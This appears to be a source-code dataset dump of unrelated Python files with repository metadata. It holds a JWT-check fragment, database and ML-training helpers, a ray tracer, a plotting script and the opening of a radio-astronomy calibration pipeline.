if 'X-API-KEY' in request.headers:
token = request.headers['X-API-KEY']
if not token:
return {'result': 'no token found'}, 401
try:
token = jwt.decode(token, secret_key, algorithm='HS256'), 401
except:
return {'result': 'Invalid token'}, 401
return f(*arg, **kwargs)
return decorated
| 27.142857
| 73
| 0.594737
|
c4145d2fdef983dfc50590276d7264afaef9f940
| 404
|
py
|
Python
|
aleph/tests/factories/models/collection.py
|
jalmquist/aleph
|
28a56bc7edd77dbd7910c94dac40916032edc177
|
[
"MIT"
] | 7
|
2020-02-18T14:35:10.000Z
|
2020-03-09T22:53:10.000Z
|
aleph/tests/factories/models/collection.py
|
heartofstone/aleph
|
d66b6615d2bfa10c291c63754f53b468de8bebde
|
[
"MIT"
] | 7
|
2017-08-16T12:49:23.000Z
|
2018-02-16T10:22:11.000Z
|
aleph/tests/factories/models/collection.py
|
heartofstone/aleph
|
d66b6615d2bfa10c291c63754f53b468de8bebde
|
[
"MIT"
] | 6
|
2017-07-26T12:29:53.000Z
|
2017-08-18T09:35:50.000Z
|
import factory
from aleph.core import db
from aleph.model import Collection
class CollectionFactory(factory.alchemy.SQLAlchemyModelFactory):
class Meta:
model = Collection
sqlalchemy_session = db.session
foreign_id = factory.Faker('uuid4')
label = factory.Faker('company')
countries = factory.Sequence(
lambda n: [factory.Faker('country_code').generate({})])
| 23.764706
| 64
| 0.710396
|
de70fb75b519752b971f2b1652d68d1bdb6bd6a6
| 1,271
|
py
|
Python
|
immudb/handler/zadd.py
|
codenotary/immu-py
|
a0607041247ad0aedb3791318fa2ce17d03f796b
|
[
"Apache-2.0"
] | 3
|
2020-03-17T09:27:25.000Z
|
2020-05-29T20:31:38.000Z
|
immudb/handler/zadd.py
|
codenotary/immu-py
|
a0607041247ad0aedb3791318fa2ce17d03f796b
|
[
"Apache-2.0"
] | 5
|
2020-05-12T07:35:21.000Z
|
2020-09-10T15:27:47.000Z
|
immudb/handler/zadd.py
|
codenotary/immu-py
|
a0607041247ad0aedb3791318fa2ce17d03f796b
|
[
"Apache-2.0"
] | 3
|
2020-04-08T08:16:26.000Z
|
2020-09-08T07:46:02.000Z
|
# Copyright 2022 CodeNotary, Inc. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from dataclasses import dataclass
from immudb.grpc import schema_pb2
from immudb.grpc import schema_pb2_grpc
from immudb.rootService import RootService
from immudb.exceptions import ErrCorruptedData
from immudb import datatypes
def call(service: schema_pb2_grpc.ImmuServiceStub, rs: RootService, zset: bytes, score: float, key: bytes, atTx: int = 0):
request = schema_pb2.ZAddRequest(
set=zset,
score=score,
key=key,
atTx=atTx,
boundRef=atTx > 0,
)
msg = service.ZAdd(request)
if msg.nentries != 1:
raise ErrCorruptedData
return datatypes.SetResponse(
id=msg.id,
verified=False,
)
| 34.351351
| 122
| 0.727773
|
92996aeed29c9884cfbc8b4293d83c0f9c329cd6
| 363
|
py
|
Python
|
dataclass.py
|
hotoku/exercises-in-style
|
c2c737d141241479931a6ae85089bf202afc64bf
|
[
"MIT"
] | null | null | null |
dataclass.py
|
hotoku/exercises-in-style
|
c2c737d141241479931a6ae85089bf202afc64bf
|
[
"MIT"
] | null | null | null |
dataclass.py
|
hotoku/exercises-in-style
|
c2c737d141241479931a6ae85089bf202afc64bf
|
[
"MIT"
] | null | null | null |
from dataclasses import dataclass
@dataclass
class FizzBuzz:
n: int
def __str__(self):
if self.n % 15 == 0:
return "FizzBuzz"
elif self.n % 3 == 0:
return "Fizz"
elif self.n % 5 == 0:
return "Buzz"
else:
return str(self.n)
for n in range(1, 101):
print(FizzBuzz(n))
| 17.285714
| 33
| 0.504132
|
8031b06baa36d2473213b19dcac5e76d7e7283c4
| 9,552
|
py
|
Python
|
composer/trainer/trainer_hparams.py
|
Averylamp/composer
|
1afc56e9c207734aee75ff8c5b046fb55d928fb5
|
[
"Apache-2.0"
] | 2
|
2022-03-17T04:48:04.000Z
|
2022-03-20T09:06:19.000Z
|
composer/trainer/trainer_hparams.py
|
Averylamp/composer
|
1afc56e9c207734aee75ff8c5b046fb55d928fb5
|
[
"Apache-2.0"
] | null | null | null |
composer/trainer/trainer_hparams.py
|
Averylamp/composer
|
1afc56e9c207734aee75ff8c5b046fb55d928fb5
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 MosaicML. All Rights Reserved.
"""
Example usage and definition of hparams
"""
from __future__ import annotations
import os
from dataclasses import dataclass
from typing import TYPE_CHECKING, List, Optional
import yahp as hp
import composer
import composer.datasets as datasets
from composer.algorithms import AlgorithmHparams, get_algorithm_registry
from composer.callbacks import (BenchmarkerHparams, CallbackHparams, GradMonitorHparams, LRMonitorHparams,
MemoryMonitorHparams, SpeedMonitorHparams, TorchProfilerHparams)
from composer.core.types import Precision
from composer.datasets import DataloaderHparams
from composer.loggers import (BaseLoggerBackendHparams, FileLoggerBackendHparams, TQDMLoggerBackendHparams,
WandBLoggerBackendHparams)
from composer.models import (CIFARResNetHparams, EfficientNetB0Hparams, GPT2Hparams, MnistClassifierHparams,
ModelHparams, ResNet18Hparams, ResNet50Hparams, ResNet101Hparams, UnetHparams)
from composer.optim import (AdamHparams, AdamWHparams, DecoupledAdamWHparams, DecoupledSGDWHparams, OptimizerHparams,
RAdamHparams, RMSPropHparams, SchedulerHparams, SGDHparams, scheduler)
from composer.trainer.ddp import DDPHparams
from composer.trainer.devices import CPUDeviceHparams, DeviceHparams, GPUDeviceHparams
if TYPE_CHECKING:
from composer.trainer.trainer import Trainer
optimizer_registry = {
"adam": AdamHparams,
"adamw": AdamWHparams,
"decoupled_adamw": DecoupledAdamWHparams,
"radam": RAdamHparams,
"sgd": SGDHparams,
"decoupled_sgdw": DecoupledSGDWHparams,
"rmsprop": RMSPropHparams,
}
scheduler_registry = {
"step": scheduler.StepLRHparams,
"multistep": scheduler.MultiStepLRHparams,
"exponential": scheduler.ExponentialLRHparams,
"cosine_decay": scheduler.CosineAnnealingLRHparams,
"cosine_warmrestart": scheduler.CosineAnnealingWarmRestartsHparams,
"warmup": scheduler.WarmUpLRHparams,
"constant": scheduler.ConstantLRHparams,
}
model_registry = {
"unet": UnetHparams,
"efficientnetb0": EfficientNetB0Hparams,
"resnet56_cifar10": CIFARResNetHparams,
"resnet101": ResNet101Hparams,
"resnet50": ResNet50Hparams,
"resnet18": ResNet18Hparams,
"mnist_classifier": MnistClassifierHparams,
"gpt2": GPT2Hparams,
}
dataset_registry = {
"brats": datasets.BratsDatasetHparams,
"imagenet": datasets.ImagenetDatasetHparams,
"cifar10": datasets.CIFAR10DatasetHparams,
"synthetic": datasets.SyntheticDatasetHparams,
"mnist": datasets.MNISTDatasetHparams,
"lm": datasets.LMDatasetHparams,
}
algorithms_registry = get_algorithm_registry()
callback_registry = {
"pytorch_profiler": TorchProfilerHparams,
"speed_monitor": SpeedMonitorHparams,
"benchmarker": BenchmarkerHparams,
"lr_monitor": LRMonitorHparams,
"grad_monitor": GradMonitorHparams,
"memory_monitor": MemoryMonitorHparams,
}
logger_registry = {
"file": FileLoggerBackendHparams,
"wandb": WandBLoggerBackendHparams,
"tqdm": TQDMLoggerBackendHparams,
}
device_registry = {
"gpu": GPUDeviceHparams,
"cpu": CPUDeviceHparams,
}
@dataclass
class TrainerHparams(hp.Hparams):
"""Params for the :class:`Trainer`.
See the documentation for the :class:`Trainer`.
"""
hparams_registry = { # type: ignore
"algorithms": algorithms_registry,
"optimizer": optimizer_registry,
"schedulers": scheduler_registry,
"loggers": logger_registry,
"model": model_registry,
"train_dataset": dataset_registry,
"val_dataset": dataset_registry,
"callbacks": callback_registry,
"device": device_registry,
}
device: DeviceHparams = hp.required(doc="Device Parameters")
train_dataset: datasets.DatasetHparams = hp.required(doc="Training dataset hparams")
val_dataset: datasets.DatasetHparams = hp.required(doc="Validation dataset hparams")
optimizer: OptimizerHparams = hp.required(doc="Optimizer to use")
model: ModelHparams = hp.required(doc="model")
loggers: List[BaseLoggerBackendHparams] = hp.required(doc="loggers to use")
max_epochs: int = hp.required(
doc="training time in epochs and/or batches (e.g., 90ep5ba)",
template_default=10,
)
total_batch_size: int = hp.required(
doc="batch size for each optimization step, across all devices and gradient accumulations.",
template_default=2048,
)
eval_batch_size: int = hp.required(
doc="batch size to use for each evaluation step",
template_default=2048,
)
dataloader: DataloaderHparams = hp.required(doc="dataloader hparams")
grad_accum: int = hp.required(
template_default=1,
doc=
"Determines the number of microbatches to split a per-gpu batch into, used to compensate for low-memory-capacity devices."
)
precision: Precision = hp.required(doc="Precision to use for training", template_default=Precision.AMP)
ddp: DDPHparams = hp.optional(doc="DDP configuration", default_factory=DDPHparams)
grad_clip_norm: Optional[float] = hp.optional(
default=None, doc='the norm to clip gradient magnitudes to. Default: None (no clip)')
algorithms: List[AlgorithmHparams] = hp.optional(doc="Algorithms to employ", default_factory=list)
schedulers: List[SchedulerHparams] = hp.optional(doc="Scheduler sequence", default_factory=list)
seed: Optional[int] = hp.optional(default=None, doc="random seed to set")
validate_every_n_epochs: int = hp.optional(
doc="Validate every N epochs. Set to -1 to never validate on a epochwise frequency. Defaults to 1", default=1)
validate_every_n_batches: int = hp.optional(
doc="Validate every N batches. Set to -1 to never validate on a batchwise frequency. Defaults to -1.",
default=-1)
callbacks: List[CallbackHparams] = hp.optional(doc="Callback hparams", default_factory=list)
checkpoint_filepath: Optional[str] = hp.optional(doc="Path to an existing checkpoint file to load from.",
default=None)
checkpoint_interval_unit: Optional[str] = hp.optional(
doc=
"Unit for the checkpoint save interval -- should be 'ep' for epochs; 'ba' for batches, or None to disable checkpointing",
default=None)
checkpoint_interval: int = hp.optional(doc="Interval for checkpointing.", default=1)
checkpoint_folder: str = hp.optional(doc="Folder in which to save checkpoint files", default="checkpoints")
deterministic_mode: bool = hp.optional(doc="Run the model deterministically. Experimental. Performance"
"degradations expected. Certain Torch modules may not have"
"deterministic implementations, which will result in a crash.",
default=False)
compute_training_metrics: bool = hp.optional(doc="Log validation metrics on training data", default=False)
log_level: str = hp.optional(doc="Python loglevel to use composer", default="INFO")
ddp_sync_strategy: Optional[str] = hp.optional(doc="Strategy for DDP syncing", default=None)
def validate(self):
super().validate()
num_procs = 1
if isinstance(self.device, GPUDeviceHparams) and self.device.n_gpus > 0:
num_procs = self.device.n_gpus
if isinstance(self.device, CPUDeviceHparams) and self.device.n_cpus > 0:
num_procs = self.device.n_cpus
if self.total_batch_size % (num_procs * self.ddp.num_nodes) != 0:
raise ValueError(
f"batch size ({self.total_batch_size}) not divisible by the number of proccesses per node ({num_procs}) "
f"times the number of nodes ({self.ddp.num_nodes} ")
if self.eval_batch_size % (num_procs * self.ddp.num_nodes) != 0:
raise ValueError(
f"eval batch size ({self.eval_batch_size}) not divisible by the number of proccesses per node ({num_procs}) "
f"times the number of nodes ({self.ddp.num_nodes}")
def initialize_object(self) -> Trainer:
from composer.trainer.trainer import Trainer
return Trainer.create_from_hparams(hparams=self)
def set_datadir(self, datadir: str) -> None:
"""Override the ``datadir`` property in the :attr:`train_dataset` and :attr:`val_dataset`.
Args:
datadir (str): The datadir
Raises
AttributeError: Raised if either :attr:`train_dataset` or :attr:`val_dataset` do not
have a ``datadir`` property.
"""
if not hasattr(self.train_dataset, 'datadir') or not hasattr(self.val_dataset, 'datadir'):
raise AttributeError('Both the train and val dataset hparams must have the datadir attribute.')
setattr(self.train_dataset, 'datadir', datadir)
setattr(self.val_dataset, 'datadir', datadir)
@classmethod
def load(cls, model: str) -> TrainerHparams:
model_hparams_file = os.path.join(
os.path.dirname(composer.__file__),
"yamls",
"models",
f"{model}.yaml",
)
trainer_hparams = TrainerHparams.create(model_hparams_file, cli_args=False)
assert isinstance(trainer_hparams, TrainerHparams), "trainer hparams should return an instance of self"
return trainer_hparams
| 41.894737
| 130
| 0.696922
|
1172a55dd2c09451bcf0bb2ecb5c979a8794e682
| 6,378
|
py
|
Python
|
Milo Yip's ray-tracing bencmark/smallpt_python/smallpt.py
|
THISISAGOODNAME/miniRayTracing
|
48b8fc54df0f11d784bcd783885bc9b39d5ae7b1
|
[
"MIT"
] | 2
|
2017-07-13T08:06:32.000Z
|
2018-11-22T05:04:44.000Z
|
Milo Yip's ray-tracing bencmark/smallpt_python/smallpt.py
|
THISISAGOODNAME/miniRayTracing
|
48b8fc54df0f11d784bcd783885bc9b39d5ae7b1
|
[
"MIT"
] | null | null | null |
Milo Yip's ray-tracing bencmark/smallpt_python/smallpt.py
|
THISISAGOODNAME/miniRayTracing
|
48b8fc54df0f11d784bcd783885bc9b39d5ae7b1
|
[
"MIT"
] | null | null | null |
import math
import time
import sys
class RandomLCG:
def __init__(self, seed):
self.seed = seed
def __call__(self) :
self.seed = (214013 * self.seed + 2531011) % 0x100000000
return self.seed * (1.0 / 4294967296.0)
class Vec:
def __init__(self, x, y, z):
self.x = x
self.y = y
self.z = z
def __add__(self, b):
return Vec(self.x + b.x, self.y + b.y, self.z + b.z)
def __sub__(self, b):
return Vec(self.x - b.x, self.y - b.y, self.z - b.z)
def __mul__(self, b):
return Vec(self.x * b, self.y * b, self.z * b)
def mult(self, b):
return Vec(self.x * b.x, self.y * b.y, self.z * b.z)
def norm(self):
return self * (1.0 / math.sqrt(self.x * self.x + self.y * self.y + self.z * self.z))
def __pow__(self, b): # dot product
return self.x * b.x + self.y * b.y + self.z * b.z
def __mod__(self, b):
return Vec(self.y * b.z - self.z * b.y, self.z * b.x - self.x * b.z, self.x * b.y - self.y * b.x)
Vec.Zero = Vec(0, 0, 0)
Vec.XAxis = Vec(1, 0, 0)
Vec.YAxis = Vec(0, 1, 0)
Vec.ZAxis = Vec(0, 0, 1)
class Refl:
(DIFF, SPEC, REFR) = range(3)
class Ray:
def __init__(self, o, d):
self.o = o
self.d = d
class Sphere:
def __init__(self, rad, p, e, c, refl):
self.rad = rad
self.p = p
self.e = e
self.c = c
self.refl = refl
self.sqRad = rad * rad
self.maxC = max(c.x, c.y, c.z)
if self.maxC == 0:
self.cc = Vec.Zero
else:
self.cc = c * (1.0 / self.maxC)
def intersect(self, r):
# Solve t^2*d.d + 2*t*(o-p).d + (o-p).(o-p)-R^2 = 0
op = self.p - r.o
b = op ** r.d
det = b * b - op ** op + self.sqRad
eps = 1e-4
if det < 0:
return 0
else:
dets = math.sqrt(det)
if b - dets > eps:
return b - dets
elif b + dets > eps:
return b + dets
else:
return 0
# Scene: radius, position, emission, color, material
spheres = [
Sphere(1e5, Vec( 1e5+1,40.8,81.6), Vec.Zero, Vec(.75,.25,.25), Refl.DIFF), #Left
Sphere(1e5, Vec(-1e5+99,40.8,81.6), Vec.Zero, Vec(.25,.25,.75), Refl.DIFF), #Rght
Sphere(1e5, Vec(50,40.8, 1e5), Vec.Zero, Vec(.75,.75,.75), Refl.DIFF), #Back
Sphere(1e5, Vec(50,40.8,-1e5+170), Vec.Zero, Vec.Zero, Refl.DIFF), #Frnt
Sphere(1e5, Vec(50, 1e5, 81.6), Vec.Zero, Vec(.75,.75,.75), Refl.DIFF), #Botm
Sphere(1e5, Vec(50,-1e5+81.6,81.6), Vec.Zero, Vec(.75,.75,.75), Refl.DIFF), #Top
Sphere(16.5, Vec(27,16.5,47), Vec.Zero, Vec(1,1,1)*.999, Refl.SPEC), #Mirr
Sphere(16.5, Vec(73,16.5,78), Vec.Zero, Vec(1,1,1)*.999, Refl.REFR), #Glas
Sphere(600, Vec(50,681.6-.27,81.6), Vec(12,12,12), Vec.Zero, Refl.DIFF) #Lite
]
rand = RandomLCG(0)
def clamp(x):
if x < 0:
return 0
elif x > 1:
return 1
else:
return x
def toInt(x):
return int((clamp(x) ** (1 / 2.2)) * 255 + .5)
def intersect(r):
t = 1e20
for s in spheres:
d = s.intersect(r)
if d != 0 and d < t:
t = d
obj = s
return obj, t
def radiance(r, depth):
obj, t = intersect(r)
if obj == None:
return Vec.Zero # if miss, return black
else:
newDepth = depth + 1
isMaxDepth = newDepth > 100
# Russian roulette for path termination
isUseRR = newDepth > 5
isRR = isUseRR and rand() < obj.maxC
if isMaxDepth or (isUseRR and not isRR):
return obj.e
else:
f = (isUseRR and isRR) and obj.cc or obj.c
x = r.o + r.d * t
n = (x - obj.p).norm()
nl = n ** r.d < 0 and n or n * -1
if obj.refl == Refl.DIFF: # Ideal DIFFUSE reflection
r1 = 2 * math.pi * rand()
r2 = rand()
r2s = math.sqrt(r2)
w = nl
wo = abs(w.x) > .1 and Vec.YAxis or Vec.XAxis
u = (wo % w).norm()
v = w % u
d = (u * (math.cos(r1) * r2s) + v * (math.sin(r1) * r2s) + w * math.sqrt(1 - r2)).norm()
return obj.e + f.mult(radiance(Ray(x, d), newDepth))
elif obj.refl == Refl.SPEC: # Ideal SPECULAR reflection
return obj.e + f.mult(radiance(Ray(x, r.d - n * (2 * n ** r.d)), newDepth))
else: # Ideal dielectric REFRACTION
reflRay = Ray(x, r.d - n * (2 * n ** r.d))
into = n ** nl > 0 # from outside going in?
nc = 1
nt = 1.5
nnt = into and nc / nt or nt / nc
ddn = r.d ** nl
cos2t = 1 - nnt * nnt * (1 - ddn * ddn)
if cos2t < 0: # Total internal reflection
return obj.e + f.mult(radiance(reflRay, newDepth))
else:
tdir = (r.d * nnt - n * ((into and 1 or -1) * (ddn * nnt + math.sqrt(cos2t)))).norm()
a = nt - nc
b = nt + nc
R0 = a * a / (b * b)
c = 1 - (into and -ddn or tdir ** n)
Re = R0 + (1 - R0) * c * c * c * c * c
Tr = 1 - Re
P = .25 + .5 * Re
RP = Re / P
TP = Tr / (1 - P)
if newDepth > 2:
# Russian roulette and splitting for selecting reflection and/or refraction
if rand() < P:
result = radiance(reflRay, newDepth) * RP
else:
result = radiance(Ray(x, tdir), newDepth) * TP
else:
result = radiance(reflRay, newDepth)* Re + radiance(Ray(x, tdir), newDepth) * Tr
return obj.e + f.mult(result)
start = time.clock()
w = 256
h = 256
if len(sys.argv) == 2:
samps = int(sys.argv[1]) / 4
else:
samps = 25
# cam pos, dir
cam = Ray(Vec(50, 52, 295.6), Vec(0, -0.042612, -1).norm())
cx = Vec(w * .5135 / h, 0, 0)
cy = (cx % cam.d).norm() * .5135
# final color buffer
c = {}
# Loop over image rows
for y in range(0, h):
sys.stderr.write('\rRendering ({0} spp) {1:2.2%}'.format(samps * 4, y / (h - 1)))
# Loop cols
for x in range(0, w):
i = (h - y - 1) * w + x
c[i] = Vec.Zero
# 2x2 subpixel rows
for sy in range (0, 2):
# 2x2 subpixel cols
for sx in range (0, 2):
r = Vec.Zero
for s in range(samps):
r1 = 2 * rand()
r2 = 2 * rand()
dx = (r1 < 1) and (math.sqrt(r1) - 1) or (1 - math.sqrt(2 - r1))
dy = (r2 < 1) and (math.sqrt(r2) - 1) or (1 - math.sqrt(2 - r2))
d = cx * (((sx + .5 + dx) / 2 + x) / w - .5) + \
cy * (((sy + .5 + dy) / 2 + y) / h - .5) + cam.d
# Camera rays are pushed forward to start in interior
camRay = Ray(cam.o + d * 140, d.norm())
# Accumuate radiance
r = r + radiance(camRay, 0) * (1.0 / samps)
# Convert radiance to color
c[i] = c[i] + Vec(clamp(r.x), clamp(r.y), clamp(r.z)) * .25
print('\n{0} sec'.format(time.clock() - start))
f = open('image.ppm', 'w')
f.write('P3\n{0} {1}\n{2}\n'.format(w, h, 255))
for i in range(0, w * h):
f.write('{0} {1} {2}\n'.format(toInt(c[i].x), toInt(c[i].y), toInt(c[i].z)))
| 25.410359
| 99
| 0.544528
|
7761738a1da0bc0113005a44c7ad89060e1eaaed
| 8,212
|
py
|
Python
|
plotter/opt_mesh.py
|
tttor/nbwpg
|
271718362cf0cd810c7ea0cd9726e77276947e58
|
[
"MIT"
] | null | null | null |
plotter/opt_mesh.py
|
tttor/nbwpg
|
271718362cf0cd810c7ea0cd9726e77276947e58
|
[
"MIT"
] | null | null | null |
plotter/opt_mesh.py
|
tttor/nbwpg
|
271718362cf0cd810c7ea0cd9726e77276947e58
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# https://matplotlib.org/3.1.1/gallery/images_contours_and_fields/multi_image.html#sphx-glr-gallery-images-contours-and-fields-multi-image-py
# https://matplotlib.org/3.3.2/api/_as_gen/matplotlib.axes.Axes.imshow.html#matplotlib.axes.Axes.imshow
# https://stackoverflow.com/questions/5263034/remove-colorbar-from-figure-in-matplotlib
# https://matplotlib.org/3.1.1/gallery/pyplots/text_layout.html#sphx-glr-gallery-pyplots-text-layout-py
# https://stackoverflow.com/questions/52767798/reduce-horizontal-colorbar-padding
import os, pickle, argparse, yaml
import numpy as np, matplotlib.pyplot as plt, matplotlib as mpl
import util_bwopt_plotter as u
def main():
arg = parse_arg()
with open(os.path.join(arg.cfg), 'r') as f:
cfg = yaml.load(f)
envcfg_dpath = os.path.join(arg.gymdir, 'gym-symbol/gym_symbol/envs/config')
envcfg_fname = cfg['envid'].replace('-', '_').lower() + '.yaml'
with open(os.path.join(envcfg_dpath, envcfg_fname), 'r') as f2:
envcfg = yaml.load(f2)
cfg = {**cfg, **envcfg['deterministic_policy']}
print(cfg)
for spec_idx, spec in enumerate(cfg['spec_list']):
print('plotting spec_idx', spec_idx, len(cfg['spec_list'])-1, '=======')
plot(spec, cfg, arg)
def plot(spec, cfg, arg):
print('loading...')
def check_spec(cfg):
for k, v in spec.items():
if cfg[k] != v:
return False
return True
logdir = os.path.dirname(arg.cfg); datadir = os.path.join(logdir, 'data')
zs_list = []; seed_list = []
for mesh_fname in os.listdir(datadir):
if '.pkl' not in mesh_fname:
continue
with open(os.path.join(datadir, mesh_fname), 'rb') as f:
meshdata = pickle.load(f); seed = meshdata['seed']
# print(meshdata.keys()); print(meshdata['cfg']); exit()
if not(check_spec(meshdata['cfg'])):
continue
if ('commonseed_list' in cfg.keys()) and (seed not in cfg['commonseed_list']):
continue
print(mesh_fname[0:200], seed)
seed_list.append(seed)
xs, ys = meshdata['wxmat'], meshdata['wymat'] # the parameter(=[weight, bias]) mesh
obj = arg.data.split('_')[0]
zs = meshdata[obj]
zs, x_sorted, y_sorted = u.arrange_mesh2mat(xs, ys, zs, meshdata['cfg']['round_decimal'])
if obj == 'disc':
gamma = meshdata['discountfactor'][0, 0] # same for all mesh coordinates
zs = (1 - gamma)*zs
if '_diff' in arg.data:
if obj=='disc':
gamma_str = '{:.2f}'.format(gamma) if (gamma <= 0.99) else '{:.8f}'.format(gamma)
max_value = (1 - gamma)*cfg['ds0_'+gamma_str+'_max']
elif obj=='bias':
max_value = cfg['bs0max_gainmax']
else:
raise NotImplementedError(obj)
zs = max_value - zs
if '_ratio' in arg.data:
zs = zs/max_value
if '_abs' in arg.data:
zs = np.abs(zs)
zs_list.append(zs)
seed_list = sorted(seed_list)
print(len(seed_list), seed_list, 'commonseed=', 'commonseed_list' in cfg.keys())
assert len(seed_list) > 0; assert len(set(seed_list))>=len(seed_list)
zs = np.nanmean(np.stack(zs_list), axis=u.sample_dimth)
u.print_stat(zs, tag=arg.data); # print('x_sorted', x_sorted); print('y_sorted', y_sorted)
print('plotting mat', arg.data)
fig, ax = plt.subplots(figsize=(12, 9))
label_fontsize = 25; tick_fontsize = 20
text_halign = 'center'; text_valign = 'center'
try:
text_size = cfg['text_size'][arg.data]
except:
text_size = 60
if arg.data.replace('_abs', '').replace('_ratio', '') in ['bias_diff', 'gain_diff', 'disc_diff']:
cmap = mpl.cm.cool
elif arg.data in ['fval', 'bias', 'gain', 'disc', 'gainopt_fval']:
cmap = mpl.cm.plasma
elif arg.data in ['gainopt_converged', 'rollback']:
cmap = mpl.cm.rainbow
else:
raise NotImplementedError(arg.data)
assert arg.data in cfg['colorbar_ticks'] # decided to strictly enforce this
if arg.data in cfg['colorbar_ticks']:
cb_ticks = cfg['colorbar_ticks'][arg.data]
cb_tickmin = min(cfg['colorbar_ticks'][arg.data])
cb_tickmax = max(cfg['colorbar_ticks'][arg.data])
print("cfg['colorbar_ticks']['force']", cfg['colorbar_ticks']['force'])
if cfg['colorbar_ticks']['force']:
print('WARN: affect the statistic that will be taken later!')
zs[zs < cb_tickmin] = cb_tickmin; zs[zs > cb_tickmax] = cb_tickmax
else:
assert (zs[~np.isnan(zs)] <= cb_tickmax).all()
assert (zs[~np.isnan(zs)] >= cb_tickmin).all()
else:
cb_tickmin = min(zs[~np.isnan(zs)])
cb_tickmax = max(zs[~np.isnan(zs)])
cb_ticks = [cb_tickmin, cb_tickmax]
print('cb_tickmin {} cb_tickmax {}'.format(cb_tickmin, cb_tickmax))
norm = mpl.colors.Normalize(vmin=cb_tickmin, vmax=cb_tickmax)
cax = ax.matshow(zs, origin='lower', cmap=cmap, interpolation='none', norm=norm)
cb = fig.colorbar(cax, ticks=cb_ticks, label='', pad=0.01)
if arg.cbar==0:
cb.remove()
info = '${:.3f} \pm {:.3f}$'.format(np.nanmean(zs), np.nanstd(zs))
ax.text(0.5, 0.5, info,
fontdict={'size': text_size, 'family': 'serif', 'color': 'black', 'weight': 'normal'},
horizontalalignment=text_halign, verticalalignment=text_valign, transform=ax.transAxes)
# ax.set_xlabel('1st weight $(x)$', fontsize=label_fontsize)
# ax.set_ylabel('2nd weight $(y)$', fontsize=label_fontsize)
if ('xticks' in cfg.keys()) and ('yticks' in cfg.keys()):
xticktargets = cfg['xticks']
xticks = [x_sorted.index(i) for i in xticktargets]
xticklabels = ['{:.1f}'.format(i) for i in xticktargets]
yticktargets = cfg['yticks']
yticks = [y_sorted.index(i) for i in yticktargets]
yticklabels = ['{:.1f}'.format(i) for i in yticktargets]
ax.set_xticks(xticks); ax.set_xticklabels(xticklabels)
ax.set_yticks(yticks); ax.set_yticklabels(yticklabels)
ax.tick_params(axis="x", bottom=True, top=False, labelbottom=True, labeltop=False, labelsize=tick_fontsize)
ax.tick_params(axis="y", labelsize=tick_fontsize)
ax.grid(axis='both'); ax.set_aspect('auto')
print('writing')
envid = u.get_shortenvid(meshdata['cfg']['envid'])
polnet = meshdata['cfg']['polnet']['mode']
tag = [arg.data] + ['{}={}'.format(k, v) for k, v in spec.items()]
tag += ['nseed{}'.format(len(zs_list)), polnet, envid]
fname = '__'.join(tag)
plt.savefig(os.path.join(logdir, fname + '.png'), dpi=300, bbox_inches='tight')
plt.close(fig)
if arg.cbarx==1:
print('writing colorbar standalone ...')
fig = plt.figure(figsize=(12, 9))
ax = fig.add_axes([0.05, 0.05, 0.05, 0.9])
cb = mpl.colorbar.ColorbarBase(ax, cmap=cmap, norm=norm, orientation='vertical',
ticks=cfg['colorbar_ticks'][arg.data])
# cb.set_label(label='Bias $v_b(s_0, \mathbf{\\theta})$ at the final iteration', fontsize=label_fontsize)
for yt in cb.ax.get_yticklabels():
yt.set_fontsize(tick_fontsize)
fname = '__'.join([fname, 'colorbar'])
plt.savefig(os.path.join(logdir, fname + '.png'), dpi=300, bbox_inches='tight')
plt.close(fig)
def parse_arg():
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--cfg', help='config fpath', type=str, default=None, required=True)
parser.add_argument('--data', help='data type', type=str, default=None, required=True)
parser.add_argument('--gymdir', help='customized gym-env dir', type=str, required=True)
parser.add_argument('--cbar', help='colorbar mode', type=int, default=1)
parser.add_argument('--cbarx', help='colorbar: standalone', type=int, default=0)
arg = parser.parse_args()
arg.cfg = arg.cfg.replace('file://','')
return arg
if __name__ == '__main__':
main()
| 47.744186
| 141
| 0.61471
|
b8e3ee3f320078e0944e2cd41cbb180eac8d6b49
| 16,825
|
py
|
Python
|
11B-124/pipeline_scripts/casa_pipeline_lines.py
|
Astroua/LocalGroup-VLA
|
4920341c9e25343d724fb4a2e37cdcd234201047
|
[
"MIT"
] | 1
|
2019-04-11T00:37:56.000Z
|
2019-04-11T00:37:56.000Z
|
11B-124/pipeline_scripts/casa_pipeline_lines.py
|
Astroua/LocalGroup-VLA
|
4920341c9e25343d724fb4a2e37cdcd234201047
|
[
"MIT"
] | null | null | null |
11B-124/pipeline_scripts/casa_pipeline_lines.py
|
Astroua/LocalGroup-VLA
|
4920341c9e25343d724fb4a2e37cdcd234201047
|
[
"MIT"
] | null | null | null |
import sys
import os
from glob import glob
import shutil
import numpy as np
from shutil import copyfile
from tasks import plotms, importasdm
# This is my adaptation of the editIntents function in the
# NRAO analysis_scripts for VLA intents instead of ALMA
# https://github.com/e-koch/VLA_Lband/blob/master/CASA_functions/editIntents_EVLA.py
from editIntents_EVLA import editIntents as editIntents_VLA
mySDM = sys.argv[-1]
myvis = mySDM if mySDM.endswith("ms") else mySDM + ".ms"
# Look for a custom flagging script in the repo and copy over.
parentdir = os.getcwd().split("/")[-1]
flag_filename = "{}_lines_flags.txt".format(parentdir)
flag_path = os.path.expanduser("~/LocalGroup-VLA/11B-124/pipeline_scripts/track_flagging")
full_flag_filename = os.path.join(flag_path, flag_filename)
if os.path.exists(full_flag_filename):
copyfile(full_flag_filename,
"additional_flagging.txt")
else:
print("No additional flagging script found in the VLA_Lband repo"
" for lines.")
# Before running the pipeline, convert the SDM to an MS file
# and correct the scan intents
importasdm(asdm=mySDM, vis=myvis, ocorr_mode='co',
applyflags=True, savecmds=True, tbuff=1.5,
outfile='{}.flagonline.txt'.format(mySDM),
createmms=False)
# Remove gain cal from 3C48 scans
editIntents_VLA(msName=myvis, field='3C48',
newintents='BANDPASS,DELAY,FLUX')
# First scan is setup
editIntents_VLA(msName=myvis, field='3C48', scan='1',
newintents='SYS_CONFIG')
# And the gain cal only has phases specified. Need amp too
editIntents_VLA(msName=myvis, field='J0029+3456',
